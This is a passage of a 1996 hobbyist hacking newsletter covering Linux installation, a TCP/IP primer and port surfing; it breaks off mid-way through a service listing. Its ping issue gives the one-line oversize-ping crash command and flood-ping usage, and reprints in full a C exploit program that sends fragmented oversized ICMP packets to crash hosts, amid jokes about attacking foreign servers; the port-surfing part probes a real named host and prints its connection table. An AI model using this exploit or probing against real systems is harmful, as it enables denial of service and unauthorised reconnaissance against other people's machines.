and Web sites. If you have hacker friends in your area, most of them probably use Linux and can help you out. <br />********************* <br />Historical note: Linux was created in 1991 by a group led by Linus Torvalds of the University of Helsinki. Linux is copyrighted under the GNU General Public License. Under this agreement, Linux may be redistributed to anyone along with the source code. Anyone can sell any variant of Linux and modify it and repackage it. But even if someone modifies the source code he or she may not claim copyright for anything created from Linux. Anyone who sells a modified version of Linux must provide source code to the buyers and allow them to reuse it in their commercial products without charging licensing fees. This arrangement is known as a "copyleft." <br />Under this arrangement the original creators of Linux receive no licensing or shareware fees. Linus Torvalds and the many others who have contributed to Linux have done so from the joy of programming and a sense of community with all of us who will hopefully use Linux in the spirit of good guy hacking. Viva Linux! Viva Torvalds! <br />********************** <br />Linux consists of the operating system itself (called the "kernel") plus a set of associated programs. <br />The kernel, like all types of Unix, is a multitasking, multi-user operating system. Although it uses a different file structure, and hence is not directly compatible with DOS and Windows, it is so flexible that many DOS and Windows programs can be run while in Linux. So a power user will probably want to boot up in Linux and then be able to run DOS and Windows programs from Linux. <br />Associated programs that come with most Linux distributions may include: <br />* a shell program (Bourne Again Shell -- BASH -- is most common); <br />* compilers for programming languages such as Fortran-77 (my favorite!), C, C++, Pascal, LISP, Modula-2, Ada, Basic (the best language for a beginner), and Smalltalk.; <br />* X (sometimes called X-windows), a graphical user interface <br />* utility programs such as the email reader Pine (my favorite) and Elm <br />Top ten reasons to install Linux on your PC: <br />1.When Linux is outlawed, only outlaws will own Linux. <br />2. When installing Linux, it is so much fun to run fdisk without backing up first. <br />3.The flames you get from asking questions on Linux newsgroups are of a higher quality than the flames you get for posting to alt.sex.bestiality. <br />4.No matter what flavor of Linux you install, you'll find out tomorrow there was a far more 3l1te ersion you should have gotten instead. <br />5.People who use Free BSD or Solaris will not make fun of you. They will offer their sympathy instead. <br />6.At the next Def Con you'll be able to say stuph like "so then I su-ed to his account and grepped all his files for 'kissyface'." Oops, grepping other people's files is a no-no, forget I ever suggested it. <br />7.Port surf in privacy. <br />8.One word: exploits. <br />9.Installing Linux on your office PC is like being a postal worker and bringing an Uzi to work. <br />10.But - - if you install Linux on your office computer, you boss won't have a clue what that means. <br />What types of Linux work best? It depends on what you really want. Redhat Linux is famed for being the easiest to install. The Walnut Creek Linux 3.0 CD-ROM set is also really easy to install -- for Linux, that is! My approach has been to get lots of Linux versions and mix and match the best from each distribution. <br />I like the Walnut Creek version best because with my brand X hardware, its autodetection feature was a life-saver. <br />INSTALLING LINUX is not for the faint of heart! Several tips for surviving installation are: <br />1) Although you in theory can run Linux on a 286 with 4 MB RAM and two floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a CD-ROM, and at least 200 MB free hard disk space. <br />2) Know as much as possible about what type of mother board, modem, hard disk, CD-ROM, and video card you have. If you have any documentation for these, have them on hand to reference during installation. <br />3) It works better to use hardware that is name-brand and somewhat out-of-date on your computer. Because Linux is freeware, it doesn't offer device drivers for all the latest hardware. And if your hardware is like mine -- lots of Brand X and El Cheapo stuph, you can take a long time experimenting with what drivers will work. <br />4) Before beginning installation, back up your hard disk(s)! In theory you can install Linux without harming your DOS/Windows files. But we are all human, especially if following the advice of point 7). <br />5) Get more than one Linux distribution. The first time I successfully installed Linux, I finally hit on something that worked by using the boot disk from one distribution with the CD-ROM for another. In any case, each Linux distribution had different utility programs, operating system emulators, compilers and more. Add them all to your system and you will be set up to become beyond elite. <br />6) Buy a book or two or three on Linux. I didn't like any of them! But they are better than nothing. Most books on Linux come with one or two CD-ROMs that can be used to install Linux. But I found that what was in the books did not exactly coincide with what was on the CD-ROMs. <br />7) I recommend drinking while installing. It may not make debugging go any faster, but at least you won't care how hard it is. <br />Now I can almost guarantee that even following all these 6 pieces of advice, you will still have problems installing Linux. Oh, do I have 7 advisories up there? Forget number 7. But be of good cheer. Since everyone else also suffers mightily when installing and using Linux, the Internet has an incredible wealth of resources for the Linux -challenged. <br />If you are allergic to getting flamed, you can start out with Linux support Web sites. <br />The best I have found is http://sunsite.unc.edu:/pub/Linux/. It includes the Linux Frequently Asked Questions list (FAQ), available from <br />sunsite.unc.edu:/pub/Linux/docs/FAQ. <br />In the directory /pub/Linux/docs on sunsite.unc.edu you'll find a number of other documents about Linux, including the Linux INFO-SHEET and META-FAQ, <br />The Linux HOWTO archive is on the sunsite.unc.edu Web site at: /pub/Linux/docs/HOWTO. The directory /pub/Linux/docs/LDP contains the current set of LDP manuals. <br />You can get ``Linux Installation and Getting Started'' from sunsite.unc.edu in /pub/Linux/docs/LDP/install-guide. The README file there describes how you can order a printed copy of the book of the same name (about 180 pages). <br />Now if you don't mind getting flamed, you may want to post questions to the amazing number of Usenet news groups that cover Linux. These include: <br />comp.os.linux.advocacy Benefits of Linux compared <br />comp.os.linux.development.system Linux kernels, device drivers <br />comp.os.linux.x Linux X Window System servers <br />comp.os.linux.development.apps Writing Linux applications <br />comp.os.linux.hardware Hardware compatibility <br />comp.os.linux.setup Linux installation <br />comp.os.linux.networking Networking and communications <br />comp.os.linux.answers FAQs, How-To's, READMEs, etc. <br />linux.redhat.misc <br />alt.os.linux Use comp.os.linux.* instead <br />alt.uu.comp.os.linux.questions Usenet University helps you <br />comp.os.linux.announce Announcements important to Linux <br />comp.os.linux.misc Linux-specific topics <br />Want your Linux free? Tobin Fricke has pointed out that "free copies of Linux CD-ROMs are available the Linux Support & CD Givaway web site at http://emile.math.ucsb.edu:8000/giveaway.html. This is a project where people donate Linux CD's that they don't need any more. The project was seeded by Linux Systems Labs, who donated 800 Linux CDs initially! Please remember to donate your Linux CD's when you are done with them. If you live near a computer swap meet, Fry's, Microcenter, or other such place, look for Linux CD's there. They are usually under $20, which is an excellent investment. I personally like the Linux Developer's Resource by Infomagic, which is now up to a seven CD set, I believe, which includes all major Linux distributions (Slackware, Redhat, Debian, Linux for DEC Alpha to name a few)plus mirrors of tsx11.mit.edu and sunsite.unc.edu/pub/linux plus much more. You should also visit the WONDERFUL linux page at <br />http://sunsite.unc.edu/linux, which has tons of information, as well as the <br />http://www.linux.org/. You might also want to check out <br />http://www.redhat.com/ and http://www.caldera.com/ for more <br />information on commercial versions of linux (which are still freely available under GNU)." <br />How about Linux security? Yes, Linux, like every operating system, is imperfect. Eminently hackable, if you really want to know. So if you want to find out how to secure your Linux system, or if you should come across one of the many ISPs that use Linux and want to go exploring (oops, forget I <br />wrote that), here's where you can go for info: <br />ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks <br />ftp://info.cert.org/pub/tech_tips/root_compromise <br />http://bach.cis.temple.edu/linux/linux-security/ <br />http://www.geek-girl.com/bugtraq/ <br />There is also help for Linux users on Internet Relay Chat (IRC). Ben (cyberkid@usa.net) <br />hosts a channel called #LinuxHelp on the Undernet IRC server. <br /><br />Last but not least, if you want to ask Linux questions on the Happy Hacker list, you're welcome. We may be the blind leading the blind, but what <br />the heck! <br />________________________________________ <br />Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end. <br />________________________________________ <br />____________________________________________________________ <br />GUIDE TO (mostly) HARMLESS HACKING <br />Vol. 2 Number 3 <br />Introduction to TCP/IP. That means packets! Datagrams! Ping oversize packet denial of service exploit explained. But this hack is a lot less mostly harmless than most. Don't try this at home... <br />____________________________________________________________ <br />If you have been on the Happy Hacker list for awhile, you've been getting some items forwarded from the Bugtraq list on a new ping packet exploit. <br />Now if this has been sounding like gibberish to you, relax. It is really very simple. In fact, it is so simple that if you use Windows 95, by the time you finish this article you will know a simple, one-line command that you could use to crash many Internet hosts and routers. <br />************************************************* <br />YOU CAN GO TO JAIL WARNING: This time I'm not going to implore the wannabe evil genius types on this list to be virtuous and resist the temptation to misuse the information I'm about to give them. See if I care! If one of those guys gets caught crashing thousands of Internet hosts and routers, not only will they go to jail and get a big fine. We'll all think he or she is a dork. This exploit is a no-brainer, one-line command from Windows 95. Yeah, the operating system that is designed for clueless morons. So there is nothing elite about this hack. What is elite is being able to thwart this attack. <br />************************************************** <br />************************************************** <br />NEWBIE NOTE: If packets, datagrams, and TCP/IP aren't exactly your bosom buddies yet, believe me, you need to really get in bed with them in order to call yourself a hacker. So hang in here for some technical stuff. When <br />we are done, you'll have the satisfaction of knowing you could wreak havoc on the Internet, but are too elite to do so. <br />A packet is a way to send information electronically that keeps out errors. The idea is that no transmission technology is perfect. Have you ever played the game "telephone"? You get a dozen or so people in a circle and the first person whispers a message to the second. Something like "The bun is the lowest form of wheat." The second person whispers to the third, "A bum is the lowest form of cheating." The third whispers, "Rum is the lowest form of <br />drinking." And so on. It's really fun to find out how far the message can mutate as it goes around the circle. <br />But when, for example, you get email, you would prefer that it isn't messed up. So the computer that sends the email breaks it up into little pieces called datagrams. Then it wraps things around each datagram that tell what <br />computer it needs to go to, where it came from, and that check whether the datagram might have been garbled. These wrapped up datagram packages are called "packets." <br />Now if the computer sending email to you were to package a really long message into just one packet, chances are pretty high that it will get messed up while on its way to the other computer. Bit burps. So when the receiving computer checks the packet and finds that it got messed up, it <br />will throw it away and tell the other computer to send it again. It could take a long time until this giant packet gets through intact. <br />But if the message is broken into a lot of little pieces and wrapped up into bunches of packets, most of them will be good and the receiving computer will keep them. It will then tell the sending computer to retransmit just the packets that messed up. Then when all the pieces finally get there, the receiving computer puts them together in the right order and lo and behold, there is the complete, error-free email. <br />TCP/IP stands for Transmission Control Protocol/Internet Protocol. It tells computers that are hooked up to the Internet how to package up messages into packets and how to read packets these packets from other computers. Ping uses TCP/IP to make its packets. <br />********************************************** <br />"Ping" is a command that sends a feeler out from your computer to another computer to see if it is turned on and hooked to the same network you are on. On the Internet there are some ten million computers that you can ping. <br />Ping is a command you can give, for example, from the Unix, Windows 95 and Windows NT operating systems. It is part of the Internet Control Message Protocol (ICMP), which is used to troubleshoot TCP/IP networks. What it does is tell a remote computer to echo back a ping. So if you get your ping <br />back, you know that computer is alive. Furthermore, some forms of the ping command will also tell you how long it takes for a message to go out to that computer and come back again. <br />But how does your computer know that the ping it just sent out actually echoed back from the targeted computer? The datagram is the answer. The ping sent out a datagram. If the returning ping holds this same datagram, you know it was your ping that just echoed back. <br />The basic format of this command is simply: <br />ping hostname <br />where "hostname" is the Internet address of the computer you want to check out. <br />When I give this command from Sun Release 4.1 Unix, I get the answer "hostname is alive." <br />************************************** <br />TECHNICAL TIP: Because of the destructive powers of ping, many Internet Service Providers hide the ping program in their shell accounts where clueless newbies can't get their hands on it. If your shell account says "command not found" when you enter the ping command, try: <br />/usr/etc/ping hostname <br />If this doesn't work, either try the command “whereis ping” or complain to your ISP's tech support. They may have ddiabled ping for ordinary users, but if you convince tech support you are a good Internet citizen they may let you use it. <br />*************************************** <br />**************************************** <br />NEWBIE NOTE: You say you can't find a way to ping from your on-line service? That may be because you don't have a shell account. But there is one thing you really need in order to hack: A SHELL ACCOUNT!!!! <br />The reason hackers make fun of people with America Online accounts is because that ISP doesn't give out shell accounts. This is because America Online wants you to be good boys and girls and not hack! <br />A "shell account" is an Internet account in which your computer becomes a terminal of one of your ISP's host computers. Once you are in the "shell" you can give commands to the operating system (which is usually Unix) just <br />like you were sitting there at the console of one of your ISP's hosts. <br />You may already have a shell account but just not know how to log on to it. Call tech support with your ISP to find out whether you have one, and how to get on it. <br />*************************************** <br />There are all sorts of fancy variations on the ping command. And, guess what, whenever there is a command you give over the Internet that has lots of variations, you can just about count on there being something hackable in there. Muhahaha! <br />The flood ping is a simple example. If your operating system will let you get away with giving the command: <br />-> ping -f hostname <br />it sends out a veritable flood of pings, as fast as your ISP's host machine can make them. This keeps the host you've targeted so busy echoing back your pings that it can do little else. It also puts a heavy load on the network. <br />Hackers with primitive skill levels will sometimes get together and use several of their computers at once to simultaneously ping some victim's Internet host computer. This will generally keep the victim's computer too <br />busy to do anything else. It may even crash. However, the down side (from the attackers' viewpoint) is that it keeps the attackers' computers tied up, too. <br />************************************** <br />NETIQUETTE NOTE: Flood pinging a computer is extremely rude. Get caught doing this and you will be lucky if the worst that happens is your on-line service provider closes your account. Do this to a serious hacker and you may need an identity transplant. <br />If you should start a flood ping kind of by accident, you can shut it off by holding down the control key and pressing "c" (control-c). <br />************************************** <br />************************************* <br />EVIL GENIUS TIP: Ping yourself! If you are using some sort of Unix, your operating system will let you use your computer to do just about anything to itself that it can do to other computers. The network address that takes you <br />back to your own host computer is localhost (or 127.0.0.1). Here's an example of how I use localhost: <br /><slug> [65] ->telnet localhost <br />Trying 127.0.0.1 ... <br />Connected to localhost. <br />Escape character is '^]'. <br /><br /><br />SunOS UNIX (slug) <br /><br />login: <br />See, I'm back to the login sequence for the computer named "slug" all over <br />again. <br />Now I ping myself: <br /><llama> [68] ->/usr/etc/ping localhost <br />localhost is alive <br />This gives the same result as if I were to command: <br /><llama> [69] ->/usr/etc/ping llama <br />llama.swcp.com is alive <br />**************************************** <br />***************************************** <br />MUHAHAHA TIP: Want to yank someone's chain? Tell him to ftp to 127.0.0.1 and log in using his or her own user name and password for kewl warez! My ex-husband Keith Henson did that to the Church of Scientology. The COGs ftp-ed to 127.0.0.1 and discovered all their copyrighted scriptures. They <br />assumed this was on Keith's computer, not theirs. They were *so* sure he had their scriptures that they took him to court. The judge, when he realized they were simply looping back to their own computer, literally laughed them out of court. <br />For a hilarious transcript or audio tape of this infamous court session, email hkhenson@cup.portal.com. That's Keith's email address. My hat is off to a superb hacker! <br />******************************************* <br />However, the oversize ping packet exploit you are about to learn will do even more damage to some hosts than a gang of flood ping conspirators. And it will do it without tying up the attackers' computer for any longer than the split second it takes to send out just one ping. <br />The easiest way to do this hack is to run Windows 95. Don't have it? You can generally find a El Cheapo store that will sell it to you for $99. <br />To do this, first set up your Windows 95 system so that you can make a PPP or SLIP connection with the Internet using the Dialup Networking program under the My Computer icon. You may need some help from your ISP tech support in setting this up. You must do it this way or this hack won't work. Your America Online dialer *definitely* will not work. <br />************************************ <br />NEWBIE NOTE: If your Internet connection allows you to run a Web browser that shows pictures, you can use that dialup number with your Windows 95 Dialup Networking program to get either a PPP or SLIP connection. <br />************************************ <br />Next, get your connected to the Internet. But don't run a browser or anything. Instead, once your Dialup Networking program tell you that you have a connection, click on the "Start" button and go to the listing "MS-DOS." Open this DOS window. You'll get a prompt: <br />C:\windows\> <br />Now let's first do this the good citizen way. At this prompt you can type in a plain ordinary "ping" command: <br />C:\windows\ping hostname <br />where "hostname" is the address of some Internet computer. For example, you could ping thales.nmia.com, which is one of my favorite computers, named after an obscure Greek philosopher. <br />Now if you happened to know the address of one of Saddam Hussein's computers, however, you might want to give the command: <br />c:\windows\ping -l 65510 saddam_hussein's.computer.mil <br />Now don't really do this to a real computer! Some, but not all, computers will crash and either remain hung or reboot when they get this ping. Others will continue working cheerily along, and then suddenly go under hours later. <br />Why? That extra added -l 65510 creates a giant datagram for the ping packet. Some computers, when asked to send back an identical datagram, get really messed up. <br />If you want all the gory details on this ping exploit, including how to protect your computers from it, check out <br />http://www.sophist.demon.co.uk/ping. <br />Now there are other ways to manufacture a giant ping datagram besides using Windows 95. For example, if you run certain FreeBSD or Linux versions of Unix on your PC, you can run this program, which was posted to the Bugtraq list. <br />From: Bill Fenner <fenner@freefall.freebsd.org> <br />To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org> <br />Subject: Ping exploit program <br /><br />Since some people don't necessarily have Windows '95 boxes lying around, I (Fenner) wrote the following exploit program. It requires a raw socket layer that doesn't mess with the packet, so BSD 4.3, SunOS and Solaris are <br />out. It works fine on 4.4BSD systems. It should work on Linux if you compile with -DREALLY_RAW. <br /><br />Feel free to do with this what you want. Please use this tool only to test your own machines, and not to crash others'. <br />* win95ping.c <br />* <br />* Simulate the evil win95 "ping -l 65510 buggyhost". <br />* version 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996 <br />* <br />* This requires raw sockets that don't mess with the packet at all (other <br />* than adding the checksum). That means that SunOS, Solaris, and <br />* BSD4.3-based systems are out. BSD4.4 systems (FreeBSD, NetBSD, <br />* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux <br />* system to try it on. <br />* <br />* The attack from the Win95 box looks like: <br />* 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+) <br />* 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+) <br />* 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+) <br />* 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+) <br />* 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+) <br />* 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+) <br />* 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+ <br />* 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+) <br />* 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+) <br />* 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+) <br />* 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+) <br />* 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+) <br />* 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+) <br />* 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+) <br />* 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+) <br />* 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+) <br />* 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+) <br />* 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+) <br />* 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+) <br />* 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+) <br />* 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+) <br />* 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+) <br />* 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+) <br />* 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+) <br />* 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+) <br />* 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+) <br />* 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+) <br />* 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+) <br />* 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+) <br />* 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+) <br />* 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+) <br />* 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+) <br />* 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+) <br />* 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+) <br />* 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+) <br />* 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+) <br />* 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+) <br />* 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+) <br />* 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+) <br />* 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+) <br />* 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+) <br />* 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+) <br />* 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+) <br />* 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+) <br />* 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120) <br />* <br />*/ <br /><br />#include <stdio.h> <br />#include <sys/types.h> <br />#include <sys/socket.h> <br />#include <netdb.h> <br />#include <netinet/in.h> <br />#include <netinet/in_systm.h> <br />#include <netinet/ip.h> <br />#include <netinet/ip_icmp.h> <br /><br />/* <br />* If your kernel doesn't muck with raw packets, #define REALLY_RAW. <br />* This is probably only Linux. <br />*/ <br />#ifdef REALLY_RAW <br />#define FIX(x) htons(x) <br />#else <br />#define FIX(x) (x) <br />#endif <br /><br />int <br />main(int argc, char **argv) <br />{ <br />int s; <br />char buf[1500]; <br />struct ip *ip = (struct ip *)buf; <br />struct icmp *icmp = (struct icmp *)(ip + 1); <br />struct hostent *hp; <br />struct sockaddr_in dst; <br />int offset; <br />int on = 1; <br /><br />bzero(buf, sizeof buf); <br />if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) { <br />perror("socket"); <br />exit(1); <br />} <br />if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) { <br />perror("IP_HDRINCL"); <br />exit(1); <br />} <br />if (argc != 2) { <br />fprintf(stderr, "usage: %s hostname\n", argv[0]); <br />exit(1); <br />} <br />if ((hp = gethostbyname(argv[1])) == NULL) { <br />if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) { <br />fprintf(stderr, "%s: unknown host\n", argv[1]); <br />} <br />} else { <br />bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); <br />} <br />printf("Sending to %s\n", inet_ntoa(ip->ip_dst)); <br />ip->ip_v = 4; <br />ip->ip_hl = sizeof *ip >> 2; <br />ip->ip_tos = 0; <br />ip->ip_len = FIX(sizeof buf); <br />ip->ip_id = htons(4321); <br />ip->ip_off = FIX(0); <br />ip->ip_ttl = 255; <br />ip->ip_p = 1; <br />ip->ip_sum = 0; /* kernel fills in */ <br />ip->ip_src.s_addr = 0; /* kernel fills in */ <br /><br />dst.sin_addr = ip->ip_dst; <br />dst.sin_family = AF_INET; <br /><br />icmp->icmp_type = ICMP_ECHO; <br />icmp->icmp_code = 0; <br />icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)); <br />/* the checksum of all 0's is easy to compute */ <br />for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) { <br />ip->ip_off = FIX(offset >> 3); <br />if (offset < 65120) <br />ip->ip_off |= FIX(IP_MF); <br />else <br />ip->ip_len = FIX(418); /* make total 65538 */ <br />if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst, <br />sizeof dst) < 0) { <br />fprintf(stderr, "offset %d: ", offset); <br />perror("sendto"); <br />} <br />if (offset == 0) { <br />icmp->icmp_type = 0; <br />icmp->icmp_code = 0; <br />icmp->icmp_cksum = 0; <br />} <br />} <br />} <br />(End of Fenner's ping exploit message.) <br />******************************************** <br />YOU CAN GO TO JAIL NOTE: Not only is this hack not elite, if you are reading this you don't know enough to keep from getting busted from doing this ping hack. On the other hand, if you were to do it to an Internet host in Iraq... <br />******************************************** <br />Of course there are many other kewl things you can do with ping. If you have a shell account, you can find out lots of stuph about ping by giving the command: <br />man ping <br />In fact, you can get lots of details on any Unix command with "man." <br />Have fun with ping -- and be good! But remember, I'm not begging the evil genius wannabes to be good. See if I care when you get busted... <br />_________________________________________________________ <br />To subscribe, email hacker@techbroker.com with message “subscribe hh.” To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to <br />dev/null@techbroker.com. Happy hacking! <br />Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.. <br />________________________________________________________ <br />____________________________________________________________ <br />GUIDE TO (mostly) HARMLESS HACKING <br />Vol. 2 Number 4 <br />More intro to TCP/IP: port surfing! Daemons! How to get on almost any computer without logging in and without breaking the law. Impress your clueless friends and actually discover kewl, legal, safe stuph. <br />____________________________________________________________ <br />A few days ago I had a lady friend visiting. She’s 42 and doesn’t own a computer. However, she is taking a class on personal computers at a community college. She wanted to know what all this hacking stuph is about. So I decided to introduce her to port surfing. And while doing it, we stumbled across something kewl. <br />Port surfing takes advantage of the structure of TCP/IP. This is the protocol (set of rules) used for computers to talk to each other over the Internet. One of the basic principles of Unix (the most popular operating system on the Internet) is to assign a “port” to every function that one computer might command another to perform. Common examples are to send and receive email, read Usenet newsgroups, telnet, transfer files, and offer Web pages. <br />************************ <br />Newbie note #1: A computer port is a place where information goes in or out of it. On your home computer, examples of ports are your monitor, which sends information out, your keyboard and mouse, which send information in, and your modem, which sends information both out and in. <br />But an Internet host computer such as callisto.unm.edu has many more ports than a typical home computer. These ports are identified by numbers. Now these are not all physical ports, like a keyboard or RS232 serial port (for your modem). They are virtual (software) ports. <br />A “service” is a program running on a “port.” When you telnet to a port, that program is up and running, just waiting for your input. Happy hacking! <br />************************ <br />So if you want to read a Web page, your browser contacts port number 80 and tells the computer that manages that Web site to let you in. And, sure enough, you get into that Web server computer without a password. <br />OK, big deal. That’s pretty standard for the Internet. Many -- most -- computers on the Internet will let you do some things with them without needing a password, <br />However, the essence of hacking is doing things that aren’t obvious. That don’t just jump out at you from the manuals. One way you can move a step up from the run of the mill computer user is to learn how to port surf. <br />The essence of port surfing is to pick out a target computer and explore it to see what ports are open and what you can do with them. <br />Now if you are a lazy hacker you can use canned hacker tools such as Satan or Netcat. These are programs you can run from Linux, FreeBSD or Solaris (all types of Unix) from your PC. They automatically scan your target computers. They will tell you what ports are in use. They will also probe these ports for presence of daemons with know security flaws, and tell you what they are. <br />******************************** <br />Newbie note # 2: A daemon is not some sort of grinch or gremlin or 666 guy. It is a program that runs in the background on many (but not all) Unix system ports. It waits for you to come along and use it. If you find a daemon on a port, it’s probably hackable. Some hacker tools will tell you what the hackable features are of the daemons they detect. <br />******************************** <br />However, there are several reasons to surf ports by hand instead of automatically. <br />1) You will learn something. Probing manually you get a gut feel for how the daemon running on that port behaves. It’s the difference between watching an x-rated movie and (blush). <br />2) You can impress your friends. If you run a canned hacker tool like Satan your friends will look at you and say, “Big deal. I can run programs, too.” They will immediately catch on to the dirty little secret of the hacker world. Most hacking exploits are just lamerz running programs they picked up from some BBS or ftp site. But if you enter commands keystroke by keystroke they will see you using your brain. And you can help them play with daemons, too, and give them a giant rush. <br />3) The truly elite hackers surf ports and play with daemons by hand because it is the only way to discover something new. There are only a few hundred hackers -- at most -- who discover new stuph. The rest just run canned exploits over and over and over again. Boring. But I am teaching you how to reach the pinnacle of hackerdom. <br />Now let me tell you what my middle aged friend and I discovered just messing around. First, we decided we didn’t want to waste our time messing with some minor little host computer. Hey, let’s go for the big time! <br />So how do you find a big kahuna computer on the Internet? We started with a domain which consisted of a LAN of PCs running Linux that I happened to already know about, that is used by the New Mexico Internet Access ISP: nmia.com. <br />***************************** <br />Newbie Note # 3: A domain is an Internet address. You can use it to look up who runs the computers used by the domain, and also to look up how that domain is connected to the rest of the Internet. <br />***************************** <br />So to do this we first logged into my shell account with Southwest Cyberport. I gave the command: <br /><slug> [66] ->whois nmia.com <br />New Mexico Internet Access (NMIA-DOM) <br />2201 Buena Vista SE <br />Albuquerque, NM 87106 <br />Domain Name: NMIA.COM <br />Administrative Contact, Technical Contact, Zone Contact: <br />Orrell, Stan (SO11) SAO@NMIA.COM <br />(505) 877-0617 <br />Record last updated on 11-Mar-94. <br />Record created on 11-Mar-94. <br />Domain servers in listed order: <br />NS.NMIA.COM 198.59.166.10 <br />GRANDE.NM.ORG 129.121.1.2 <br />Now it’s a good bet that grande.nm.org is serving a lot of other Internet hosts beside nmia.com. Here’s how we port surf our way to find this out: <br /><slug> [67] ->telnet grande.nm.org 15 <br />Trying 129.121.1.2 ... <br />Connected to grande.nm.org. <br />Escape character is '^]'. <br />TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1 <br />Product License Authorization Expiration Date <br />---------- ------- ------------- --------------- <br />MULTINET Yes A-137-1641 (none) <br />NFS-CLIENT Yes A-137-113237 (none) <br />*** Configuration for file "MULTINET:NETWORK_DEVICES.CONFIGURATION" *** <br />Device Adapter CSR Address Flags/Vector <br />------ ------- ----------- ------------ <br />se0 (Shared VMS Ethernet/FDDI) -NONE- -NONE- -NONE- <br />MultiNet Active Connections, including servers: <br />Proto Rcv-Q Snd-Q Local Address (Port) Foreign Address (Port) State <br />----- ----- ----- ------------------ ------------------ ----- <br />TCP 0 822 GRANDE.NM.ORG(NETSTAT) 198.59.115.24(1569) ESTABLISHED <br />TCP 0 0 GRANDE.NM.ORG(POP3) 164.64.201.67(1256) ESTABLISHED <br />TCP 0 0 GRANDE.NM.ORG(4918) 129.121.254.5(TELNET) ESTABLISHED <br />TCP 0 0 GRANDE.NM.ORG(TELNET) AVATAR.NM.ORG(3141) ESTABLISHED <br />TCP 0 0 *(NAMESERVICE) *(*) LISTEN <br />TCP 0 0 *(TELNET) *(*) LISTEN <br />TCP 0 0 *(FTP) *(*) LISTEN <br />TCP 0 0 *(FINGER) *(*) LISTEN <br />TCP 0 0 *(NETSTAT) *(*) LISTEN <br />TCP 0 0 *(SMTP) *(*) LISTEN <br />TCP 0 0 *(LOGIN) *(*) LISTEN <br />TCP 0 0 *(SHELL) *(*) LISTEN <br />TCP 0 0 *(EXEC) *(*) LISTEN <br />TCP 0 0 *(RPC) *(*) LISTEN <br />TCP 0 0 *(NETCONTROL) *(*) LISTEN <br />TCP 0 0 *(SYSTAT) *(*) LISTEN <br />TCP 0 0 *(CHARGEN) *(*) LISTEN <br />TCP 0 0 *(DAYTIME) *(*) LISTEN <br />TCP 0 0 *(TIME) *(*) LISTEN <br />TCP 0 0 *(ECHO) *(*) LISTEN <br />TCP 0 0 *(DISCARD) *(*) LISTEN <br />TCP 0 0 *(PRINTER) *(*) LISTEN <br />TCP 0 0 *(POP2) *(*) LISTEN <br />TCP 0 0 *(POP3) *(*) LISTEN <br />TCP 0 0 *(KERBEROS_MASTER) *(*) LISTEN <br />TCP 0 0 *(KLOGIN) *(*) LISTEN <br />TCP 0 0 